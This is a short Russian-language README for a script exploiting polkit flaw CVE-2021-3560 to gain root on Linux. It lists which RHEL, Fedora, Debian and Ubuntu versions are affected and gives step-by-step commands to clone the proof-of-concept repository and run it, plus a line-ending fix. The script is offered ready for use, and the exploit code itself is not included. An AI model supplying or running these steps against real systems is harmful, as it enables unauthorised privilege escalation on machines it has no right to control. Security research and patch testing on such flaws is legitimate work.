
Автоматизированный скрипт повышения привилегий, эксплуатирующий CVE-2021-3560 в polkit для получения root-доступа на уязвимых дистрибутивах Linux.
эксплойт-скрипт для polkit
Автоматизированный скрипт для повышения привилегий до root с помощью службы polkit
| Дистрибутив | Уязвим? |
|---|---|
| RHEL 7 | Нет |
| RHEL 8 | Да |
| Fedora 20 (или более ранние) | Нет |
| Fedora 21 (или более поздние) | Да |
| Debian 10 («buster») | Нет |
| Debian testing («bullseye») | Да |
| Ubuntu 18.04 | Нет |
| Ubuntu 20.04 | Да |
ssh localhost
git clone https://github.com/tyleraharrison/CVE-2021-3560_PoC.git
cd CVE-2021-3560_PoC
./polkitRoot.sh
dos2unix polkitRoot.sh, так как GitHub изменил их на CRLF, а Bash этого не любитПротестировано на Ubuntu 20.04
Ссылка: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/